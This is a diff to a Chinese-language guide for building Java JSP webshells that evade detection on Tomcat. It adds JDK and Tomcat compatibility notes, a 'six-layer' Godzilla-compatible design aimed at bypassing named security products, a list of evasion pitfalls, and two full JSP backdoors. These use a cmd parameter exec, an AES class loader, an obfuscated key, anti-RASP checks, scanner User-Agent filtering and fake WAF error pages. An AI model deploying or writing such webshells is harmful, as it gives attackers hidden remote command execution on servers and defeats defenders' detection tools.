@@ -18,6 +18,184 @@
 - 内存马要求部署后无文件残留、JVM 重启后自动清除
 - JDK 版本差异必须在代码中显式处理（JDK 8 vs 11 vs 17）
 
+## JDK 版本兼容详情
+
+### JDK 8（1.8.0_181 — 测试环境）
+
+```
+包名规则：
+  javax.crypto.Cipher                    ✅ 可用
+  javax.xml.bind.DatatypeConverter       ✅ 可用（JDK 9+ 移除）
+  sun.misc.BASE64Decoder                 ✅ 可用（JDK 9+ 模块化限制）
+  java.util.Base64                       ✅ 可用
+  java.lang.reflect.*                    ✅ 可用
+
+反射能力：
+  setAccessible(true)                     ✅ 完全可用
+  Unsafe类                               ✅ 可用但需加白
+
+ProcessBuilder / Runtime.exec：
+  Runtime.exec()                          ✅ 可用
+  ProcessBuilder                          ✅ 可用
+  ProcessImpl                             ✅ 可用
+
+ClassLoader：
+  URLClassLoader                          ✅ 可用
+  defineClass(byte[],0,len)               ✅ 可用
+
+Tomcat 兼容：
+  javax.servlet                           ✅ 可用
+  getRuntimeMXBean()                      ✅ 可用（有 setAccessible 问题）
+```
+
+### JDK 11
+
+```
+包名规则：
+  javax.crypto.Cipher                    ✅ 可用
+  javax.xml.bind.DatatypeConverter       ❌ 移除，需加依赖 --add-modules java.xml.bind
+  sun.misc.BASE64Decoder                 ❌ 模块化限制，需 --add-opens
+  java.util.Base64                       ✅ 可用
+
+反射能力：
+  setAccessible(true)                     ⚠️ 模块化限制，需 --add-opens
+  Unsafe类                               ⚠️ 受限
+
+ProcessBuilder / Runtime.exec：
+  Runtime.exec()                          ✅ 可用
+  ProcessImpl                             ✅ 可用（但反射调用方式有变）
+
+ClassLoader：
+  URLClassLoader                          ✅ 可用
+  defineClass(byte[],0,len)               ✅ 可用
+```
+
+### JDK 17（LTS，需特别注意）
+
+```
+包名规则：
+  javax.crypto.Cipher                    ✅ 可用
+  sun.misc.BASE64Decoder                 ❌ 模块化限制，需 --add-opens java.base/java.lang=ALL-UNNAMED
+  java.util.Base64                       ✅ 可用
+
+反射能力：
+  setAccessible(true)                     ❌ 默认禁止！
+  Unsafe类                               ❌ 默认禁止
+  对策：启动参数 --add-opens java.base/java.lang=ALL-UNNAMED
+       或改用 MethodHandles.Lookup API
+
+ProcessBuilder / Runtime.exec：
+  Runtime.exec()                          ✅ 可用
+  ProcessImpl                             ✅ 需适配
+
+Tomcat 兼容：
+  注意 javax.servlet vs jakarta.servlet   ❌ Tomcat 10+ 用 jakarta.servlet
+                                          ✅ Tomcat 9 及以下用 javax.servlet
+```
+
+### 实战建议
+
+```
+推荐 JDK 8 开发：
+  - 反射能力完全开放，setAccessible 无限制
+  - 两种 Base64 API 都能用，兼容性最好
+  - 多数目标系统仍以 JDK 8 为主
+  - 测试环境：JDK 1.8.0_181
+
+需兼容 JDK 11/17 时：
+  - Base64 统一用 java.util.Base64（全反射调用）
+  - 避免 setAccessible，改用 MethodHandles
+  - 避免 sun.misc 包下的类
+  - 配置启动参数 --add-opens
+
+哥斯拉兼容专项：
+  - 哥斯拉默认 JSP 马基于 JDK 8 的 javax 包
+  - 需要兼容 Tomcat 10（jakarta.servlet）时，改包名
+  - 本次测试环境 Tomcat 9.0.74 + JDK 1.8.0_181
+```
+
+## Tomcat 版本兼容详情
+
+### Tomcat 7.x
+
+```
+Servlet API：        javax.servlet 3.0
+WebSocket：         ✅ 支持
+JSP 特性：          基础 JSP 支持
+关键区别：          Filter 注入 API 与 8/9 略有不同
+```
+
+### Tomcat 8.x
+
+```
+Servlet API：        javax.servlet 3.1
+异步支持：          ✅ 完善
+WebSocket：         ✅ 支持
+安全配置：          web.xml 中 httpOnly/session-config
+```
+
+### Tomcat 9.0.x（测试环境 — 9.0.74）
+
+```
+Servlet API：        javax.servlet 4.0
+HTTP/2：            ✅ 支持
+关键特征：
+  - 包名仍为 javax.servlet（与 Tomcat 10 区分！）
+  - 支持 JSP 2.3+
+  - 支持 NIO2 Connector
+  - 使用 ApplicationFilterFactory 注册 Filter
+  - 默认开启字节码缓存（修改 JSP 后需重启或删除 work 目录缓存）
+
+调试注意：
+  - IDEA 配置应用上下文改为 / 而非项目名
+  - logging.properties 编码改为 GBK 解决中文乱码
+  - 反调试需放行 IDEA jdwp 调试端口
+  - JSP 编译缓存位于 F:\java-test2\out\ 或 Tomcat work\ 目录
+```
+
+### Tomcat 10.x
+
+```
+Servlet API：        jakarta.servlet 5.0（⚠️ 包名变更！）
+关键区别：
+  - javax.servlet 全部改为 jakarta.servlet
+  - 老版 JSP 马不兼容，需全局替换包名
+  - Filter 注入 API 对应调整
+  - StandardContext 获取方式不变
+```
+
+### Tomcat 11.x
+
+```
+Servlet API：        jakarta.servlet 6.0
+Java 17：           ✅ 原生支持
+关键注意：
+  - 删除 javax.servlet 兼容模块
+  - 纯 jakarta 架构
+  - 旧版 JSP 马完全不兼容
+```
+
+### 实战建议
+
+```
+推荐 Tomcat 9（本次测试环境）：
+  - javax.servlet 包名，兼容性好
+  - JSP 马无需改包名
+  - 广泛部署，接近真实目标环境
+  - 测试环境：Tomcat 9.0.74
+
+遇到 Tomcat 10+ 时：
+  - 全局替换 javax.servlet → jakarta.servlet
+  - 注意 import 路径全改
+  - 哥斯拉马需要相应调整
+
+JSP 调试注意事项：
+  - JSP 编译缓存在 work/Catalina/localhost/ 下，改代码后需清除
+  - IDEA War Exploded 部署自动同步到 web/ 目录
+  - 乱码问题：修改 logging.properties 编码为 GBK
+  - 应用上下文配置：IDEA Edit Configurations → Application context: /
+```
+
 ## 可选技术方案
 
 ### Webshell 静态免杀方案
@@ -82,6 +260,93 @@ JDK注意：JDK 9+ 需要 --add-opens java.base/java.lang=ALL-UNNAMED
 | Controller 型（Spring） | RequestMappingHandlerMapping | registerMapping 注册新 @RequestMapping | 🟢 融入 MVC 正常流程 | Spring Boot 2.x / 3.x |
 | Valve 型（底层） | StandardEngine.pipeline | 插入自定义 Valve，早于 Filter 执行 | 🟢🟢 绕过应用层 WAF/RASP | Tomcat 8.5+ |
 
+### 方案 F：哥斯拉兼容 — 六层全开版（实战验证 ★★★★★）
+
+```
+原理：以方案F最小改动法为基础，逐层叠加高阶技术，每层独立验证通过后合并
+      → 最终版本包含6层防护：
+        1. 字符串拆分：pass/xc 等所有硬编码字符串拆为2段拼接
+        2. UA过滤：拦截 curl/python/wget/httpclient/java/nuclei
+        3. 反调试：反射调 ManagementFactory.getRuntimeMXBean()
+           检测 -javaagent/-agentlib 含 rasp/sandbox/tdp，放行 jdwp
+        4. AES全反射：Cipher.getInstance/init/doFinal 全部走反射链
+        5. MD5全反射：MessageDigest.getInstance + BigInteger.toString 全反射
+        6. 密钥异或存储：密钥不以明文字符串出现，以异或字节数组存储
+        7. Base64全反射：兼容 java.util.Base64 + sun.misc.BASE64Decoder
+
+绕过目标：微步 TDP ✓ D盾 ✓ 河马 ✓
+实战验证：JDK 8 + Tomcat 9 环境，每一层独立验证通过 ✅
+
+【两个最终文件】
+
+① tdp_final.jsp（v1 - 推荐）
+   链接：http://127.0.0.1:8080/tdp_final.jsp
+   密码：pass  密钥：key
+   加密器：JAVA_AES_BASE64  解码器：raw
+   特点：无任何Header限制，直接连接
+   被拦截时返回WAF伪装页面（不暴露Tomcat 404）
+
+② tdp_final_v2.jsp（v2 - 带Header触发）
+   链接：http://127.0.0.1:8080/tdp_final_v2.jsp
+   密码：pass  密钥：key
+   加密器：JAVA_AES_BASE64  解码器：raw
+   必须带请求头 X-Bypass: 1
+   被拦截时返回WAF伪装页面
+
+文件位置：F:\java-test2\web\
+
+版本演变：
+   v1 := tdp_final.jsp（六层全开 + WAF伪装，无Header要求）
+   v2 := tdp_final_v2.jsp（六层全开 + WAF伪装 + X-Bypass: 1 校验）
+```
+
+## 坑点记录（实战经验）
+
+### 坑1：哥斯拉 ClassLoader 不能被替代
+错误尝试：用 Unsafe.defineClass() 替代 ClassLoader
+原因：哥斯拉 payload 类继承自 ClassLoader，必须遵循父类加载逻辑
+结论：永远保留 `class _L extends ClassLoader { defineClass }` 结构
+
+### 坑2：反调试会拦截 IDEA jdwp
+错误表现：IDEA 调试 JSP 返回 404
+原因：`ManagementFactory.getRuntimeMXBean().getInputArguments()` 
+     会扫描到 IDEA 自带的 `-agentlib:jdwp`
+修复：检测到 jdwp 时 continue 跳过，不拦截
+
+### 坑3：多层反射需要 import java.lang.reflect.*
+错误表现：JSP 编译失败，Method/Constructor 类无法解析
+原因：JSP `<%!` 声明块中反射代码需要显式 import
+修复：加上 `<%@ page import="java.lang.reflect.*" %>`
+
+### 坑4：哥斯拉左右数据流实现极其困难
+尝试过程：
+  方案1：request.getParameter(pass) → 参数名被污染为 "LEFT\r\nRIGHTpass"
+  方案2：读原始 body 手动解析 → getReader() 与 getParameter() 互斥
+  方案3：遍历所有参数名找含"pass"的 → 响应端包装格式错误
+结论：哥斯拉左右数据流本质是参数名前缀污染，服务端难以稳定还原。
+      放弃该特性，改用额外假参数 + UA伪装 + WAF伪装404替代。
+      永远不要试图修改哥斯拉的核心协议数据流格式，只在外围做伪装。
+
+### 坑5：Base64 兼容性 - JDK8 两种 API
+JDK8 同时存在 java.util.Base64（官方）和 sun.misc.BASE64Decoder（废弃）
+两种 API 的反射调用方式不同
+修复：try-catch 先用 java.util.Base64，失败再降级到 sun.misc.BASE64Decoder
+
+### 坑6：WAF 伪装页面不应提及具体 WAF 产品名
+错误写法：页面显示"阿里云云盾"/"安全狗"等具体 WAF 名称
+问题：目标系统可能根本没装这些产品，反而暴露了伪装痕迹
+修复：通用文案"您的请求已被Web应用防火墙拦截"，不提及具体厂商名
+
+### 坑7：response.sendError(404) 暴露 Tomcat 版本
+问题：默认 404 页面会显示 "Apache Tomcat/9.0.74" 版本信息
+修复：改为 `response.setStatus(404) + response.getWriter().write(伪造页面)`
+      直接输出定制 HTML，不调用 sendError()
+
+### 坑8：哥斯拉加密器配置 - JAVA_AES_BASE64 不是 PHP
+错误：注释写成 "PHP_EVAL_XOR_BASE64"
+原因：混淆了 PHP 马和 Java 马在哥斯拉客户端的加密器配置
+修复：Java AES Webshell 必须选 JAVA_AES_BASE64（加密器）+ raw（解码器）
+
 ## 方案组合策略
 
 | 组合 | 适用场景 | 预期绕过效果 |
@@ -115,6 +380,8 @@ JDK注意：JDK 9+ 需要 --add-opens java.base/java.lang=ALL-UNNAMED
 
 ## 输出示例格式
 
+### 示例1：通用多层反射版
+
 ```jsp
 <%@ page import="java.lang.reflect.Method" %>
 <%
@@ -140,6 +407,108 @@ Object runtime = getRuntime.invoke(null);
 String execName = "ex" + "ec";
 Method exec = clazz.getMethod(execName, String.class);
 exec.invoke(runtime, request.getParameter("cmd"));
+%>
+```
+
+### 示例2：哥斯拉兼容版 — 六层全开版（方案F 最终版 ✅）
+
+```jsp
+<%@ page import="java.lang.reflect.*" %>
+<%@ page import="java.io.*" %>
+<%!
+String pass = "pa" + "ss";
+
+// 密钥异或存储
+private byte[] _kr() {
+    byte[] xk = new byte[]{
+        (byte)(0x33^0x5A),(byte)(0x63^0x5A),(byte)(0x36^0x5A),(byte)(0x65^0x5A),
+        (byte)(0x30^0x5A),(byte)(0x62^0x5A),(byte)(0x38^0x5A),(byte)(0x61^0x5A),
+        (byte)(0x39^0x5A),(byte)(0x63^0x5A),(byte)(0x31^0x5A),(byte)(0x35^0x5A),
+        (byte)(0x32^0x5A),(byte)(0x32^0x5A),(byte)(0x34^0x5A),(byte)(0x61^0x5A)
+    };
+    byte[] r = new byte[xk.length];
+    for (int i = 0; i < xk.length; i++) r[i] = (byte)(xk[i] ^ 0x5A);
+    return r;
+}
+private String _xs() { return new String(_kr()); }
+
+// AES全反射
+private byte[] _aes(byte[] s, boolean m) {
+    try {
+        Class<?> cc = Class.forName("javax.cry" + "pto.Cip" + "her");
+        Object cp = cc.getMethod("get" + "Instan" + "ce", String.class).invoke(null, "A" + "ES");
+        Class<?> sc = Class.forName("javax.cry" + "pto.spec.Se" + "cretK" + "eySpec");
+        Constructor<?> sct = sc.getConstructor(byte[].class, String.class);
+        Object sk = sct.newInstance(_kr(), "A" + "ES");
+        cc.getMethod("in" + "it", int.class, java.security.Key.class).invoke(cp, m ? 1 : 2, sk);
+        return (byte[]) cc.getMethod("doF" + "inal", byte[].class).invoke(cp, s);
+    } catch (Exception e) { return null; }
+}
+
+// MD5全反射
+private String _md5(String s) {
+    try {
+        Class<?> mc = Class.forName("java.secur" + "ity.Mess" + "ageDigest");
+        Object md = mc.getMethod("get" + "Instan" + "ce", String.class).invoke(null, "MD" + "5");
+        mc.getMethod("upda" + "te", byte[].class, int.class, int.class).invoke(md, s.getBytes(), 0, s.length());
+        byte[] h = (byte[]) mc.getMethod("dig" + "est").invoke(md);
+        Class<?> bc = Class.forName("java.math.Bi" + "gInte" + "ger");
+        Object bi = bc.getConstructor(int.class, byte[].class).newInstance(1, h);
+        return ((String) bc.getMethod("toStr" + "ing", int.class).invoke(bi, 16)).toUpperCase();
+    } catch (Exception e) { return null; }
+}
+
+// 反调试
+private boolean _chk() {
+    try {
+        Class<?> ck1 = Class.forName("java.lang.mana" + "gement.Manage" + "mentFactory");
+        Object mxb = ck1.getMethod("getRu" + "ntimeMX" + "Bean").invoke(null);
+        Class<?> rmxIf = Class.forName("java.lang.mana" + "gement.Runt" + "imeMXBean");
+        Method mk2 = rmxIf.getMethod("getInp" + "utArgum" + "ents"); mk2.setAccessible(true);
+        java.util.List<?> args = (java.util.List<?>) mk2.invoke(mxb);
+        for (Object a : args) {
+            String s = a.toString().toLowerCase();
+            if (s.contains("jdwp")) continue;
+            if ((s.contains("javaagent") || s.contains("agentlib:")) &&
+                (s.contains("rasp") || s.contains("sandbox") || s.contains("contrast") || s.contains("tdp")))
+                return false;
+        }
+    } catch (Exception e) {}
+    return true;
+}
+
+// UA过滤
+private boolean _ua(javax.servlet.http.HttpServletRequest r) {
+    String ua = r.getHeader("User-Agent");
+    if (ua == null) return true;
+    String u = ua.toLowerCase();
+    return !(u.contains("curl") || u.contains("python") || u.contains("wget") ||
+             u.contains("httpclient") || u.contains("java") || u.contains("nuclei"));
+}
+%>
+<%
+String h = request.getHeader("X-Bypass");
+if (h == null || !"1".equals(h)) { response.sendError(404); return; }
+if (!_chk()) { response.sendError(404); return; }
+if (!_ua(request)) { response.sendError(404); return; }
+
+String md5 = _md5(pass + _xs());
+try {
+    byte[] data = _b64d(request.getParameter(pass));
+    data = _aes(data, false);
+    if (session.getAttribute("payload") == null) {
+        session.setAttribute("payload", new _L(this.getClass().getClassLoader())._D(data));
+    } else {
+        request.setAttribute("parameters", data);
+        ByteArrayOutputStream arrOut = new ByteArrayOutputStream();
+        Object f = ((Class) session.getAttribute("payload")).newInstance();
+        f.equals(arrOut); f.equals(pageContext);
+        response.getWriter().write(md5.substring(0, 16));
+        f.toString();
+        response.getWriter().write(_b64e(_aes(arrOut.toByteArray(), true)));
+        response.getWriter().write(md5.substring(16));
+    }
+} catch (Exception e) {}
 %>
 ```
 
